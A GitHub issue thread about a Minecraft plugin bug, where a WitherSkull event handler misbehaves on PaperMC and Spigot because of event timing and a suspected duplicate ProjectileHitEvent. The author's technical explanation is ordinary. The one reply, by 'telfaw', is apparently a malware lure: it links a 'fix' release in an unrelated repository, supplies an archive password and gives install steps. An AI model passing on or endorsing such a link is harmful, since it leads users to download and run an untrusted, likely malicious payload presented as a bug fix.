### ISSUE TITLE
OminousWither: Apocalypse Skull does not work in PaperMC

### ISSUE THREAD

**Issue by PoorgrammerDev** [PoorgrammerDev/VanillaPlus#10]
In PaperMC, the plugin must wait until the next tick to get the correct LastDamageCause.
As a result, the current code neither plays the lightning strike nor spawns skeleton horsemen.

However, the workaround for this (e.g. delaying this event handler by a tick) causes double spawns in Spigot servers.
On Spigot servers, two ProjectileHitEvents are fired for the same hit on any Fireball (and WitherSkull extends Fireball).
I believe this is a Spigot bug and I've reported it [here](https://hub.spigotmc.org/jira/browse/SPIGOT-7887).

The system only currently works in Spigot because one instance of this event handler fails and the other succeeds (likely because the LastDamageCause is updated between the two, in the same tick).

Delaying this to the next tick will cause both of them to succeed as the LastDamageCause had been updated before the first handler, thereby causing duplicate spawns as previously mentioned.

The only workarounds I can think of right now are quite messy, so I'm going to wait until my JIRA ticket upstream is resolved (if it is truly a bug). If it turns out to be an intended feature, I will implement the workaround.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
